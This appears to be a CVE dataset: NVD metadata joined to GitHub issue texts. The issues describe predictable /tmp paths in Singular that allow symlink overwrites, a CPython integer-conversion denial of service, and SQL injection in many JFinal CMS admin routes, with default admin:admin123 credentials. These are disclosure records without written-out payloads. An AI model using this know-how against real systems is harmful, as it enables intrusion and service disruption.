I just noticed commit https://github.com/Singular/Singular/commit/ed2fd9bb8a4241c386b59a55bd8bbfb1d66ac174 which led me to `git grep /tmp` in the codebase. There are several places where a fixed (or at least predictable) path under `/tmp` is used for temporary storage. This creates a [general class of vulnerability](https://owasp.org/www-community/vulnerabilities/Insecure_Temporary_File) that can usually be exploited by other users on the same machine. For example, since `/tmp` is world-writable, anyone on the machine can create `/tmp/sing_log.1` through `/tmp/sing_log.65535`, making themselves the owner of those files. Later, singular will open and write to them as some other user, namely whoever is running singular. In an extreme case, if singular is running as root, and if the bad guy has created `/tmp/sing_log.N` as links pointing to important system files, then logging can erase (overwrite) those files. I haven't tried to exploit them all, but in a few other cases, temporary files are used to store data or commands that are fed to other programs, which makes some level of code execution likely. The `mkstemp()` function is a safe replacement within C, but would have to be exposed to the user somehow to avoid the same problem in singular code.
Insecure /tmp usage due to predictable paths
https://api.github.com/repos/Singular/Singular/issues/1137/comments
5
2022-05-18T14:08:48Z
2024-08-20T12:16:19Z
https://github.com/Singular/Singular/issues/1137
1,240,027,736
1,137
4,116
CVE-2020-10735
2022-09-09T14:15:08.660
A flaw was found in python. In algorithms with quadratic time complexity using non-binary bases, when using int("text"), a system could take 50ms to parse an int string with 100,000 digits and 5s for 1,000,000 digits (float, decimal, int.from_bytes(), and int() for binary bases 2, 4, 8, 16, and 32 are not affected). The highest threat from this vulnerability is to system availability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/21/1" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/21/4" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2020-10735" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1834423" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://docs.google.com/document/d/1KjuF_aXlzPUxTK4BMgezGJ2Pn7uevfX7g0_mvgHlL7Y" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/python/cpython/issues/95778" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00039.html" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2VCU6EVQDIXNCEDJUCTFIER2WVNNDTYZ/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/32AAQKABEKFCB5DDV5OONRZK6BS23HPW/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4EWKR2SPX3JORLWCXFY3KN2U5B5CIUQQ/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6XL6E5A3I36TRR73VNBOXNIQP4AMZDFZ/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/76YE7AM37MRU76XJV4M27CWDAMUGNRYK/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HSRPVJZL6DJFWKYRHMNJB7VCEUCBKRF5/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IFGV7P2PYFBMK32OKHCAC2ZPJQV5AUDF/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NHC6IUU7CLRQ3QLPWUXLONSG3SXFTR47/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OKYE2DOI2X7WZXAWTQJZAXYIWM37HDCY/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OT5U223OE5ZOUHZAZYSYSWVJQIKDE73E/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OT5WQB7Z3CXOWVBD2AFAHYPA5ONYFFZ4/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PD7FTLJOIGMUSCDR3JAN6WRFHJEE4PH5/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SZYJSGLSCQOKXXFVJVJQAXLEOJBIWGEL/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TD7JDDKJXK6D26XAN3YRFNM2LAJHT5UO/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TMWPRAAJS7I6U3U45V7GZVXWNSECI22M/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U4ZZV4CDFRMTPDBI7C5L43RFL3XLIGUY/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UBPDVCDIUCEBE7C4NAGNA2KQJYOTPBAZ/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V7ZUJDHK7KNG6SLIFXW7MNZ6O2PUJYK6/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WXF6MQ74HVIDDSR5AE2UDR24I6D4FEPC/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZEOAJWGGY55QU35UM2OVZATBW5MX2OZD/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/21/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/21/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2020-10735" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1834423" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://docs.google.com/document/d/1KjuF_aXlzPUxTK4BMgezGJ2Pn7uevfX7g0_mvgHlL7Y" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/python/cpython/issues/95778" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00039.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2VCU6EVQDIXNCEDJUCTFIER2WVNNDTYZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/32AAQKABEKFCB5DDV5OONRZK6BS23HPW/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4EWKR2SPX3JORLWCXFY3KN2U5B5CIUQQ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6XL6E5A3I36TRR73VNBOXNIQP4AMZDFZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/76YE7AM37MRU76XJV4M27CWDAMUGNRYK/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HSRPVJZL6DJFWKYRHMNJB7VCEUCBKRF5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IFGV7P2PYFBMK32OKHCAC2ZPJQV5AUDF/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NHC6IUU7CLRQ3QLPWUXLONSG3SXFTR47/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OKYE2DOI2X7WZXAWTQJZAXYIWM37HDCY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OT5U223OE5ZOUHZAZYSYSWVJQIKDE73E/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OT5WQB7Z3CXOWVBD2AFAHYPA5ONYFFZ4/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PD7FTLJOIGMUSCDR3JAN6WRFHJEE4PH5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SZYJSGLSCQOKXXFVJVJQAXLEOJBIWGEL/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TD7JDDKJXK6D26XAN3YRFNM2LAJHT5UO/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TMWPRAAJS7I6U3U45V7GZVXWNSECI22M/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U4ZZV4CDFRMTPDBI7C5L43RFL3XLIGUY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UBPDVCDIUCEBE7C4NAGNA2KQJYOTPBAZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V7ZUJDHK7KNG6SLIFXW7MNZ6O2PUJYK6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WXF6MQ74HVIDDSR5AE2UDR24I6D4FEPC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZEOAJWGGY55QU35UM2OVZATBW5MX2OZD/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "0743C1B3-D44D-4940-AAF4-25DEFB46AC74", "versionEndExcluding": "3.7.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.7.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "5E28EB81-9BE6-4EC9-AC44-EFA4DDB0233F", "versionEndExcluding": "3.8.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "24517651-FDBB-4867-99A6-25E12EE8A117", "versionEndExcluding": "3.9.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "6D795AAC-B427-4067-99F3-D36B0F936ACB", "versionEndExcluding": "3.10.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.10.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "514A577E-5E60-40BA-ABD0-A8C5EB28BD90", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "83B71795-9C81-4E5F-967C-C11808F24B05", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:alpha3:*:*:*:*:*:*", "matchCriteriaId": "3F6F71F3-299E-4A4B-ADD1-EAD5A1D433E2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:alpha4:*:*:*:*:*:*", "matchCriteriaId": "D9BBF4E9-EA54-41B5-948E-8E3D2660B7EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:alpha5:*:*:*:*:*:*", "matchCriteriaId": "AEBFDCE7-81D4-4741-BB88-12C704515F5C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:alpha6:*:*:*:*:*:*", "matchCriteriaId": "156EB4C2-EFB7-4CEB-804D-93DB62992A63", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:alpha7:*:*:*:*:*:*", "matchCriteriaId": "8CC972AE-16A8-4B74-A3E7-36BCDD7C1ED3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "554015CB-0325-438B-8C11-0F85F54ABC50", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "8037C129-0030-455E-A359-98E14D1498D4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "7C3DC43B-72CC-4FC5-8072-F051FB47F6D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "6657ED60-908B-48E6-B95B-572E57CFBB69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:beta5:*:*:*:*:*:*", "matchCriteriaId": "1EF628A1-82F5-403C-B527-388C13507CDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.11.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "3055A198-13F8-42C0-8FD7-316AA8984A8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:quay:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1987BDA-0113-4603-B9BE-76647EB043F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:software_collections:-:*:*:*:*:*:*:*", "matchCriteriaId": "749804DA-4B27-492A-9ABA-6BB562A6B3AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "704" ]
704
https://github.com/python/cpython/issues/95778
[ "Patch", "Third Party Advisory" ]
github.com
[ "python", "cpython" ]
## Problem A Denial Of Service (DoS) issue was identified in CPython because we use binary bignum’s for our `int` implementation. A huge integer will always consume a near-quadratic amount of CPU time in conversion to or from a base 10 (decimal) string with a large number of digits. No efficient algorithm exists to do otherwise. It is quite common for Python code implementing network protocols and data serialization to do `int(untrusted_string_or_bytes_value)` on input to get a numeric value, without having limited the input length or to do `log("processing thing id %s", unknowingly_huge_integer)` or any similar concept to convert an `int` to a string without first checking its magnitude. (`http`, `json`, `xmlrpc`, `logging`, loading large values into integer via linear-time conversions such as hexadecimal stored in `yaml`, or anything computing larger values based on user controlled inputs… which then wind up attempting to output as decimal later on). All of these can suffer a CPU consuming DoS in the face of untrusted data. Everyone auditing all existing code for this, adding length guards, and maintaining that practice everywhere is not feasible nor is it what we deem the vast majority of our users want to do. This issue has been reported to the Python Security Response Team multiple times by a few different people since early 2020, most recently a few weeks ago while I was in the middle of polishing up the PR so it’d be ready before 3.11.0rc2. ## Mitigation After discussion on the Python Security Response Team mailing list the conclusion was that we needed to limit the size of integer to string conversions for non-linear time conversions (anything not a power-of-2 base) by default. And offer the ability to configure or disable this limit. The Python Steering Council is aware of this change and accepts it as necessary. <!-- gh-linked-prs --> ### Linked PRs * gh-100627 * gh-100628 * gh-101065 * gh-101066 * gh-101630 * gh-101631 <!-- /gh-linked-prs -->
CVE-2020-10735: Prevent DoS by large int<->str conversions
https://api.github.com/repos/python/cpython/issues/95778/comments
24
2022-08-08T07:53:39Z
2023-02-07T04:35:46Z
https://github.com/python/cpython/issues/95778
1,331,477,062
95,778
4,117
CVE-2022-38272
2022-09-09T14:15:08.777
JFinal CMS 5.1.0 is vulnerable to SQL Injection via /admin/article/list.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/51" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jflyfox/jfinal_cms/issues/51
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
Administrator login is required. The default account password is admin:admin123 ## admin/article/list There is a SQLI vul in background mode.The route is as following ![image-20220809171242344](http://qny.so4ms.top/pic/typora/image-20220809171242344.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successful injection at route `admin/article/list` ![image-20220809171414154](http://qny.so4ms.top/pic/typora/image-20220809171414154.png) ## admin/article/list_approve There is a SQLI vul in background mode.The route is as following ![image-20220809171803284](http://qny.so4ms.top/pic/typora/image-20220809171803284.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/article/list_approve` ![image-20220809171856633](http://qny.so4ms.top/pic/typora/image-20220809171856633.png) ## admin/comment There is a SQLI vul in background mode.The route is as following ![image-20220809172139669](http://qny.so4ms.top/pic/typora/image-20220809172139669.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/comment/list` ![image-20220809172210795](http://qny.so4ms.top/pic/typora/image-20220809172210795.png) ## admin/contact/list There is a SQLI vul in background mode.The route is as following ![image-20220809172322680](http://qny.so4ms.top/pic/typora/image-20220809172322680.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/contact/list` ![image-20220809172310037](http://qny.so4ms.top/pic/typora/image-20220809172310037.png) ## admin/foldernotice/list There is a SQLI vul in background mode.The route is as following ![image-20220809172537960](http://qny.so4ms.top/pic/typora/image-20220809172537960.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/foldernotice/list` ![image-20220809172749368](http://qny.so4ms.top/pic/typora/image-20220809172749368.png) ## admin/folderrollpicture/list There is a SQLI vul in background mode.The route is as following ![image-20220809172848024](http://qny.so4ms.top/pic/typora/image-20220809172848024.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/folderrollpicture/list` ![image-20220809172859284](http://qny.so4ms.top/pic/typora/image-20220809172859284.png) ## admin/friendlylink/list There is a SQLI vul in background mode.The route is as following ![image-20220809172925523](http://qny.so4ms.top/pic/typora/image-20220809172925523.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/friendlylink/list` ![image-20220809172951451](http://qny.so4ms.top/pic/typora/image-20220809172951451.png) ## admin/imagealbum/list There is a SQLI vul in background mode.The route is as following ![image-20220809173144022](http://qny.so4ms.top/pic/typora/image-20220809173144022.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/imagealbum/list` ![image-20220809173200483](http://qny.so4ms.top/pic/typora/image-20220809173200483.png) ## admin/image/list There is a SQLI vul in background mode.The route is as following ![image-20220809173242795](http://qny.so4ms.top/pic/typora/image-20220809173242795.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/image/list` ![image-20220809173310304](http://qny.so4ms.top/pic/typora/image-20220809173310304.png) ## admin/site/list There is a SQLI vul in background mode.The route is as following ![image-20220809173621504](http://qny.so4ms.top/pic/typora/image-20220809173621504.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/site/list` ![image-20220809173635288](http://qny.so4ms.top/pic/typora/image-20220809173635288.png)
Some SQL injection vulnerabilities exists in JFinal CMS 5.1.0
https://api.github.com/repos/jflyfox/jfinal_cms/issues/51/comments
0
2022-08-09T09:43:40Z
2022-08-09T09:46:05Z
https://github.com/jflyfox/jfinal_cms/issues/51
1,332,993,619
51
4,118
CVE-2022-38282
2022-09-09T14:15:09.267
JFinal CMS 5.1.0 is vulnerable to SQL Injection via /admin/videoalbum/list.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/52" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/52" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jflyfox/jfinal_cms/issues/52
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
Administrator login is required. The default account password is admin:admin123 ## admin/videoalbum/list There is a SQLI vul in background mode.The route is as following ![image-20220809173719466](http://qny.so4ms.top/pic/typora/image-20220809173719466.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/videoalbum/list` ![image-20220809173732745](http://qny.so4ms.top/pic/typora/image-20220809173732745.png) ## admin/video/list There is a SQLI vul in background mode.The route is as following ![image-20220809173822633](http://qny.so4ms.top/pic/typora/image-20220809173822633.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `admin/video/list` ![image-20220809173835144](http://qny.so4ms.top/pic/typora/image-20220809173835144.png) ## system/department/list There is a SQLI vul in background mode.The route is as following ![image-20220809173912226](http://qny.so4ms.top/pic/typora/image-20220809173912226.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `system/department/list` ![image-20220809173923320](http://qny.so4ms.top/pic/typora/image-20220809173923320.png) ## system/menu/list There is a SQLI vul in background mode.The route is as following ![image-20220809174004298](http://qny.so4ms.top/pic/typora/image-20220809174004298.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `system/menu/list` ![image-20220809174015340](http://qny.so4ms.top/pic/typora/image-20220809174015340.png) ## system/role/list There is a SQLI vul in background mode.The route is as following ![image-20220809174057768](http://qny.so4ms.top/pic/typora/image-20220809174057768.png) vulnerable argument passing is as following ![image-20220809171314338](http://qny.so4ms.top/pic/typora/image-20220809171314338.png) Successfully injected at route `system/role/list` ![image-20220809174108907](http://qny.so4ms.top/pic/typora/image-20220809174108907.png)
Some SQL injection vulnerabilities exists in JFinal CMS 5.1.0
